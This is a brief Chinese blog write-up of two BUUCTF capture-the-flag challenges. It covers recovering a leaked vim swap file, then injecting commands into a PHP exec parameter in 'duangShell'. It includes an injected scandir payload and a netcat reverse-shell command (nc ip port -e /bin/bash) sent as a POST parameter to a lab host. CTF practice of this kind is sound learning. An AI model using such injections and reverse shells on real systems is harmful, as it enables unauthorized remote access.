[BUUCTF]第一天训练

[BSidesCF 2019]Futurella

好久没看过这么简单的题目了,哇哇哇
整了个火星文,看不懂查看源代码在这里插入图片描述

在这里插入图片描述

[BJDCTF 2nd]duangShell

点进去发现是swp源码泄露
在这里插入图片描述
利用vim -r index.php.swp恢复文件
在这里插入图片描述
这里我知道了exec函数与system类似但是没有回显,所以我传入的参数girl_friend=print_r(scandir(dirname(__FILE__)))会没有显示
看了别人的wp,发现我们只能用反弹shell的方法了,根据提示
在这里插入图片描述
由于这题的环境靶机无法访问外网,所以需要一个内网靶机来做,这里就直接用了题目中推荐的Basic中的Linux Labs,由于这台靶机已经安装了lamp,已指出http服务,利用xshell连接主机
在这里插入图片描述
在这里插入图片描述

反弹姿势1(未成功)

在这里插入图片描述
在这里插入图片描述
开启
在这里插入图片描述
反弹shell
在这里插入图片描述
不知道为啥通不了迷惑???

反弹姿势2

post参数:nc ip port -e /bin/bash
在这里插入图片描述

在这里插入图片描述
这个靶机真垃圾
在这里插入图片描述

猜你喜欢

转载自blog.csdn.net/solitudi/article/details/108876692